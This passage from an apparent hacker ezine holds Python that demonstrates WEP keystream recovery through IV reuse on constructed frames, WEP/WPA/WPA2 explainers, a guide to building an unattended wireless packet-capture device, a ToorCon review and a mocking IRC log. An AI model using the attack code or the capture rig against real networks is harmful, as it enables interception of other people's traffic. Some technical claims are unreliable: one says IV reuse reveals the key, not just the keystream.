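def xor(a: bytes, b: bytes) -> bytes:
    """XOR two byte strings, truncated to the shorter one."""
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(iv: bytes, secret: bytes, payload: bytes) -> bytes:
    """Frame body as WEP builds it: RC4(IV || secret) XOR (payload || CRC-32 ICV)."""
    if len(iv) != 3:
        raise ValueError("WEP IV is 24 bits")
    data = payload + zlib.crc32(payload).to_bytes(4, "little")
    return xor(data, rc4_keystream(iv + secret, len(data)))


def wep_decrypt(iv: bytes, secret: bytes, body: bytes) -> bytes:
    """Decrypt and check the ICV; this path needs the secret."""
    data = xor(body, rc4_keystream(iv + secret, len(body)))
    payload, icv = data[:-4], data[-4:]
    if zlib.crc32(payload).to_bytes(4, "little") != icv:
        raise ValueError("ICV mismatch")
    return payload


def recover_with_known_plaintext(c_known: bytes, p_known: bytes,
                                 c_target: bytes) -> bytes:
    """No secret needed: c_known XOR p_known is the keystream for that IV."""
    return xor(c_target, xor(c_known, p_known))


def frames_until_iv_collision(iv_bits: int, probability: float = 0.5) -> int:
    """Birthday bound: frames with random IVs before two collide."""
    space = 2 ** iv_bits
    return math.ceil(math.sqrt(2 * space * math.log(1 / (1 - probability))))


def hours_to_exhaust(iv_bits: int, frames_per_second: float) -> float:
    """Time for a sequential IV counter to wrap and start repeating."""
    return 2 ** iv_bits / frames_per_second / 3600


# Constructed sample data: a 40-bit secret, two IVs, and two payloads that
# both start with the LLC/SNAP header carried by IP-bearing 802.11 data frames.
SECRET = bytes.fromhex("0123456789")
IV, OTHER_IV = b"\x00\x00\x01", b"\x00\x00\x02"
SNAP = bytes.fromhex("aaaa030000000800")
P1 = SNAP + b"first constructed frame."
P2 = SNAP + b"second frame, same IV!!!"

if __name__ == "__main__":
    c1, c2 = wep_encrypt(IV, SECRET, P1), wep_encrypt(IV, SECRET, P2)
    c3 = wep_encrypt(OTHER_IV, SECRET, P2)
    n = len(P1)
    print("same IV:  c1^c2 == p1^p2 ?", xor(c1, c2)[:n] == xor(P1, P2)[:n])
    print("fresh IV: c1^c3 == p1^p2 ?", xor(c1, c3)[:n] == xor(P1, P2)[:n])
    print("frame 2 read via known frame 1:",
          recover_with_known_plaintext(c1, P1, c2))
    print("random 24-bit IVs: 50% collision after",
          frames_until_iv_collision(24), "frames")
    print("24-bit counter wraps after %.1f h at 1000 frames/s"
          % hours_to_exhaust(24, 1000))
    print("48-bit counter wraps after %.0f years at 1000 frames/s"
          % (hours_to_exhaust(48, 1000) / 8766))
```

The length of the secret never enters the reuse check, only the IV does, which is why a longer WEP key does not help.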
I record all your WEP traffic until I receive 2 packets that have the same IV, aka the same RC4 keys; then I can use an XOR function to link the 2 packets and compute the key. In other words, do not use WEP AT ALL. I don't care how elite your crypto key is.

Ok, now let's cover WPA1, which is basically nothing but a TKIP ("Temporal Key Integrity Protocol") wrapper around WEP. For starters, this prevents the repeat attacks that WEP has by extending the IV to 48 bits. And by now we all know that IVs are used to encrypt the data in the packet. Now TKIP adds a few security enhancements to WEP.

The first is the cryptographic message integrity code (MIC), which prevents forgery. It's basically a cryptographic checksum that protects against forgery attacks.

The second feature, IV sequencing (TSC, "TKIP Sequence Counter"), prevents replaying of data. Basically the TSC in the IV had better match within a certain range when received, or the packets are dropped.

The 3rd method is the per-packet mixing function. Basically this means that we're changing the encryption key every now and then for the client. It also provides a message integrity checker. This method is a little too advanced to cover here.

Now remember, boys and girls, this is all based on RC4. Now the good stuff.

WPA2

WPA2 is a full implementation of certified 802.11I. It uses AES-CCMP, "(AES-C)ounter Mode (C)BC-(M)AC (P)rotocol". This is also the standard for the Pre-N series of routers. WPA2 utilizes many advanced features over WPA1. The #1 feature is AES (Advanced Encryption Standard). It's basically military crypto warez. So no more crappy RC4. It also uses a PMK (Pair-wise Master Key), which allows you to reconnect to your access point if, let's say, you walked to another AP and back. "You will not have to re-authenticate." Also, pre-authentication allows you to pre-authenticate to another AP while holding your connection to your existing AP. Basically you only need 1/10th of a second to change APs while roaming.
Now if you don't use pre-authentication with PMK caching, it would take more than a second, and some of your time-sensitive crap like video, VoIP and other crap will go FUBAR!

Ok, for the other features. For starters we get forced 128 bit keys!!! h0h0h0h0! Basically everything else is the same as WPA except for the AES standard and PMK. But for you people who want more info, I will just post information from the computing dictionary.

Official Computing Dictionary Definition below

(AES-Counter Mode CBC-MAC Protocol) The encryption algorithm used in the 802.11i security protocol. It uses the AES block cipher, but restricts the key length to 128 bits. AES-CCMP incorporates two sophisticated cryptographic techniques (counter mode and CBC-MAC) and adapts them to Ethernet frames to provide a robust security protocol between the mobile client and the access point. AES itself is a very strong cipher, but counter mode makes it difficult for an eavesdropper to spot patterns, and the CBC-MAC message integrity method ensures that messages have not been tampered with. See 802.11i, AES, counter mode and CBC-MAC.

"If you want more info on this you're really going to have to do a LOT of reading."

There is no point in trying to refine something so short and true. Call me a copy cat if you like.

Ok, now time for the phat lady to sing!

802.11 (pre-N)

802.11 (pre-N): this is basically 802.11I with certified WPA2, which in turn is a full certified implementation of 802.11I. Now the reason we use pre-N is because there is a battle going on in standards. We will not get into that here. But basically it's like what happened in the old days with the 56k modem standards: Rockwell vs US Robotics.

Now the advantages of Pre-N are huge. You get GREAT EXTENDED RANGE.
This is achieved by using something called MIMO (Multiple Input Multiple Output), in which a number of antennas transmit many unique data streams in the same frequency channel (other Wi-Fi products transmit data in a single stream in a single channel). MIMO also uses OFDM, which you should remember from above. You basically get 3 antennas. The advantages are more range, less interference and a funky looking evil router. Oh yeah, it's backwards compatible with B and G.

Now you know the VERY raw basics of wireless. Well, what happens beyond the GUI in your Wintendo XP wireless configuration. Be sure to upgrade XP to support WPA2.

Now let's all go to France and do some war driving. We can hack their WHITE-FLAG Linux boxes. After one failed login you get root and a system message of "I surrender". I don't hate French people, don't worry!

And one last message to all you knew skewl kiddies: READ, READ, LEARN! And be glad you can google.com, for it was not always this easy to GET INFORMATION!

Send hate mail to vortek@gmail.com

h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0..........................................

--------------------------------------------------------------------------------
[Harriet the Spy]======================================[Dreid ]
--------------------------------------------------------------------------------

Harriet the Spy
===============

What is Harriet the Spy?
------------------------

Harriet the Spy is designed to be a relatively low cost solution for creating a stationary battery-operated wireless packet capture system.

Yes but what does that mean?
----------------------------

It means that it's a computer whose only job is packet capture, and it can be left in one place for an extended period of time to capture packets for a specific wireless network or set of wireless networks.

What is it made of?
-------------------

The most basic configuration for Harriet requires an 802.11a or b or g router that is similar to or compatible with the Linksys WRT54G(S) series of routers, in that it can run an open source Linux-based firmware. For my experiments I used a WRT54G version 2 [1], and OpenWRT [2]. It also includes a battery pack made of 4 1.5v alkaline batteries.

How to make it.
---------------

The Battery pack.
+++++++++++++++++

The battery pack used will likely fall somewhere in this rough description no matter what kind of compatible router you get. The number of batteries you need might vary depending on the actual power usage of the router. I'm not an electrical engineer, but I do know that most consumer electronics devices do not require the full output voltage of their DC wall adapters. The WRT54G's, for instance, has a power output of 12v DC. But it can run on 6v DC without any problem. So the basic parts list for this part of the project is this:

* 1 DC Size M plug.
* 4 1.5v alkaline batteries.
* 1 battery holder of the same size.

In theory the only thing the cell of the battery would affect in this case would be runtime. So you could use anything from AA to D. I chose D for this as I just wanted to see how long I could keep it running for.

The manufacture of this battery pack is very simple and requires very minimal soldering skill (read: you should know which end to hold.) Simply take the wires from the battery holder, and solder them to the positive and negative leads on the DC Size M plug. Insert the batteries into the holder, and that's all she wrote about that. You can now power any device which can be sustained on 6v DC.

The Router and OS
+++++++++++++++++

Flashing OpenWRT onto a WRT54G or compatible router is a well documented process, and can be found here [3]. The client mode configuration is also well documented and can be found here [4].
When installing kismet you should install the kismet_server package, and turn off the wireless interface prior to starting it.

The Test
--------

The base test for battery life was to plug in the router, start up kismet, and then take a voltage reading of each battery under load. Then after an hour I'd take the readings again, and approximate how many hours before the batteries were operating at less than 30% capacity.

The initial readings were:
1.31, 1.36, 1.35, 1.34 for a total of 5.36V

After two hours the voltages read:
1.01, 1.08, 1.05, 0.95 for 4.09V

That's a 1.27V difference. If we assume the voltage drop to be linear, then every two hours we would lose 1.27V, with 1.78V being the magical 30% capacity mark. So that's about 6hrs of battery life, which isn't too shabby for the cost of production. You could capture a lot of packets in 6hrs.

Potential Problems and Potential Improvements
---------------------------------------------

So right now Harriet is capable of sitting around for 6 hours unattended and capturing packets. Of course, since it only has 4MB of storage if you're using a WRT54G, and 8MB if you're using a GS, it can only capture so many packets, especially since at least 2MB of flash is being taken up by the OS. However, one planned improvement is to add an SD card [5], which will give up to 2GB of storage. Other options would be adding a USB port and using an IDE storage device. Yet another option would be using an 802.11b ethernet bridge or USB 802.11b adapter connected to a nearby network for packet capture (just make sure you're not capturing that network's packets.)

Another potential problem is that as the batteries lose power, one could potentially damage the router hardware. This problem could be overcome by adding a low-power cut-off circuit.
Also the price of D-Cell lead-acid batteries is rather expensive over time, and one could find a much more suitable source of power, including rechargeable NiMH batteries like those used in RC cars and Airsoft guns, or even the more expensive though very reliable and long lasting Li-Poly batteries for the higher end RC vehicles.

Final Thoughts
--------------

All things considered, I believe the initial revision of Harriet the Spy is quite a success. The next steps in its evolution will be the abovementioned low-power cut-off circuit, and the addition of an SD card reader. Then I hope to field test the device in a high traffic wireless deployment. After that I'll begin experimenting with a variety of rechargeable and longer lasting battery solutions.

Footnotes
---------

[1] http://www.linksys.com/servlet/Satellite?childpagename=US%2FLayout&packedargs=c%3DL_Product_C2%26cid%3D1124916802645&pagename=Linksys%2FCommon%2FVisitorWrapper
[2] http://www.openwrt.org/
[3] http://wiki.openwrt.org/OpenWrtDocs/Installing
[4] http://wiki.openwrt.org/ClientModeHowto
[5] http://wiki.openwrt.org/OpenWrtDocs/Customizing#head-00b294c0c885db1d544fbfcd48e9367d20b38b5a

--------------------------------------------------------------------------------
[Review of ToorCon]===================================================[overdose]
--------------------------------------------------------------------------------

Overview of Toorcon, San Diego California's premiere Security conference
By OverDose

Well, first things first: I went to Toorcon, and the first night was a sort of meet and greet. There were a lot of people already there, people that were affiliated with defcon, Layer 1, and a few other conferences I had attended. There were hors d'oeuvres and an awesome social atmosphere. There were of course people talking about newer tools and recent compromises that were public and things that had happened to end users at the employer.

Saturday was the day that things got swinging. There were 2 tracks of speakers, cleverly named Smoke and Mirrors. The Smoke track, which is synonymous with digital security, had several speakers ranging from a BBS (documentary about BBSes and a MUST WATCH) Q&A to how hackers get caught. On the other track, Mirrors, synonymous with network security and trust, talks ranged from hacker versus the mobile phone to anonymous communication for the Dept. of Defense... and you.

Saturday night was awesome. The wonderful people at Toorcon had set up a party for us in the Galileo 101 in downtown San Diego, really close to the convention center where Toorcon was held. It was a two story bar of sorts, with DJs spinning lots of house, lounge, trance, and many other electronica styles. The drinks were good but expensive. Nevertheless it was an awesome time to be had by ANY geek who was down for a party.

Sunday Sept 18th was the day that was wrapping up the con, but don't let that fool you. There were many people still around and having an awesome time, chatting among each other as well as checking out the Sunday speeches. Sunday's Smoke track ran from Infrared hacking to a law enforcement panel, and the Mirrors portion ran from a "Running a small hacker conference" panel to the Future of Phishing. It really DID have it all and then some.

I want to close by saying thanks to h1kari, nfiltr8, geo, phil, SoMe_BoDy, freshman, arachne, and everyone else that helped put Toorcon together. You guys did an awesome job. One thing I HAVE to bring up was the lax environment and the courtesy towards all of the attendees. If anyone has been to a hacker con, generally you get souvenirs that you must pay for, generally from a vendor area.
This is one area where, delightfully, Toorcon differentiates itself: they gave EVERY attendee an official Toorcon shirt with dates/locations and things of this nature. How cool is it that these people appreciate each and every attendee so much that they would give them all an awesome souvenir just for attending? That's all I can say about Toorcon. If you are in the mood for a relaxing and informative time in the San Diego area, I highly suggest you attend Toorcon.

--------------------------------------------------------------------------------
[This issues LAMER.log]=====================================[#espionage @ efnet]
--------------------------------------------------------------------------------

1.9 GIGAHERTZ! 1.9 GIGAHERTZ! Yup! This, from the immature guy who went off on someone and told them to read an RF (radio frequency) book! ttransien also claims to be an ex l0pht member, but after talking to him for five minutes it's clear that he's too much of a moron to ever be in l0pht.

[20:39] lothos
[20:40] trans
[20:40] you code?
[20:40] wut
[20:40] of course
[20:40] I learned C
[20:40] didn't you download myelite software like everyone else?
[20:40] ttransien
[20:40] no
[20:40] :-o
[20:40] haven't even seen it
[20:40] * uplink sets mode: +vvvv Christ cia darkhmet lothos
[20:40] * uplink sets mode: +vvvv migzy Rav^ v_id |-|acks
[20:40] your bluetooth software?
[20:40] :O
[20:40] h0h0 mvoice
[20:41] * uplink sets mode: -vvvv playd0h trans ttransien uplink
[20:41] we're leet with +O's
[20:41] we don't need voiced
[20:41] we don't need voices
[20:41] dewd don't play around you'll soon be out of control
[20:41] h0h0h
[20:41] I gotta go for a sec
[20:41] brb
[20:41] you are 17 it is easy to forget things and go out of control
[20:41] bye >:D<
[20:41] nevermind you are too young to hug that is way gay
[20:45] h0h0
[20:58] hi
[20:59] dood if i sit my cell phone by the monitor
[20:59] my monitor flips out right before my ophone rings
[20:59] iden is notorious for that
[20:59] speakers as well
[20:59] and tv
[21:00] 1watt or so at maybe 1.9GHz
[21:00] but 1.9GHz is not the refresh rate of my monitor!
[21:00] and i doubt it's even a harmonic :D
[21:00] so i wonder what's happening
[21:02] those are the worst phones as far as radiation
[21:02] i bet it does it if i make a call too
[21:02] let me try
[21:02] yup
[21:02] and iden works on 800mhz
[21:02] iden?
[21:02] 806-866 MHz
[21:02] nextel is not gsm
[21:02] it is iden
[21:02] why do you think i'm on that freq
[21:03] if you have nextel that is your freq
[21:03] dood i'm out of the states right now
[21:03] as previously mentioned
[21:03] Integrated Dispatch Enhanced Network
[21:05] iden is 800mhz
[21:05] you've mentioned that
[21:05] yes
[21:05] however i am not in the united states currently as mentioned two or three times
[21:05] do you have a loaner phone?
[21:05] a business phone
[21:06] belongs to the company
[21:06] did they give you a phone to use overseas?
[21:06] no, the phone was already overseas
[21:06] purchased locally
[21:06] is that thru nextel?
[21:06] of course not
[21:06] we use the local network
[21:06] europe?
[21:06] asia
[21:06] 900mhz or 1800mhz then
[21:06] yo
[21:06] I'm gonna get a 5mbit connection
[21:06] not 1.9ghz
[21:07] where do they use 1900
[21:07] the usa
[21:07] 850/1900 is usa gsm
[21:07] rgr
[21:07] i'm guessing you're on 900 mhz from the way it interacts with the monitor
[21:07] what in the monitor would resonate at 800mhz
[21:07] who knows, i just know cellular
[21:08] btw my nextel is gsm; it was advertised as such and i used it in singaporre
[21:08] maybe it is then
[21:08] i have to pay more for my plan
[21:08] you should be able to use it in asia then
[21:08] i am getting a call in
[21:08] * Christ (c@220-245-133-132-vic-pppoe.tpgi.com.au) Quit (Ping timeout: 276 seconds)
[21:08] i can see it :D
[21:08] unless you're in south korea
[21:08] they use cdma not gsm
[21:08] or japan
[21:08] japan does not use gsm
[21:09] i don't know what bands my phone supports
[21:09] i do have it in a box somewhere i just didn't try
[21:09] * Christ (c@60-240-128-36.tpgi.com.au) has joined #espionage
[21:09] what country are you in?
[21:09] i have a locally purchased phone paid for y the company
[21:09] i am in cyberia :D
[21:14] anyway let's talk until my ride gets here
[21:14] i have nothing else to do
[21:14] entertain me
[21:15] ok i'll begin
[21:15] it is interesting to note that the interference only occurs before the phone rings
[21:15] which leads me to believe 2 things
[21:15] 1 - the phone ramps down power during negotiation with the tower
[21:15] 2 - i have a good signal
[21:15] 2 is confirmed by my signal bars on the display
[21:16] uplink would you like to interject an observation at this point?
[21:17] bbl
[21:17] * ttransien (~transient@get-o.net) Quit ([BX] Pretzel Boy uses BitchX.
Shouldn't you?)

--------------------------------------------------------------------------------
[/dev/urandom]=========================================[Random Facts and links ]
--------------------------------------------------------------------------------

# The Most Annoying way to make a pop-up, EVER.
http://ha.ckers.org/popup.html

# Make a website not display for people using Internet Explorer:
This site will not display in Internet Explorer

# SMS email gateways for the US cellular providers:
Sprint: 10-digit-number@messaging.sprintpcs.com
Verizon: 10-digit-number@vtext.com
AT&T: 10-digit-number@mobile.att.net
T Mobile: 10-digit-number@tmomail.net
Nextel: 10-digit-number@messaging.nextel.com
Cingular: 10-digit-number@mobile.mycingular.net
Alltel: 10-digit-number@message.alltel.com

# Practical Resources for Securing Computers:
http://www.SecureThe.Net

--------------------------------------------------------------------------------
S U B M I T   T O   K E E N   V E R A C I T Y
--------------------------------------------------------------------------------

NO! You do not have to be a member of Legions of the Underground to submit to KV. If you have an idea and would like to toss it out in the wind for general discussion, or maybe you are researching something and you just want feedback, KV is a great way to get your ideas out in the open. We at Legions of the Underground are not prejudiced in any way, shape or form, so even an AOLer's article may be published if it seems that it has clue. Or then again, maybe hell will freeze over! Anyone's stuff may be published, but we will never know if you don't submit! So get to writing. Because what you don't know can kill you! Legions of the Underground is an equal opportunity destroyer (of systems and great walls alike).
--------------------------------------------------------------------------------
All submissions to: kv@legions.org
--------------------------------------------------------------------------------
IRC: Undernet #legions
--------------------------------------------------------------------------------
O F T E N   I M I T A T E D   N E V E R   D U P L I C A T E D
--------------------------------------------------------------------------------
L E G I O N S   O F   T H E   U N D E R G R O U N D

[ASCII art: L.O.U. logo]
[knowledge is key]

--------------------------------------------------------------------------------
All mention of LoU, Legions of the Underground, Legions, KV, or Keen Veracity, copyright (c) 2000-2005 legions.org, all human rights reserved outside the US.
--------------------------------------------------------------------------------
[LoU]=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=[LoU]
W W W . L E G I O N S . O R G
[LoU]=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=[LoU]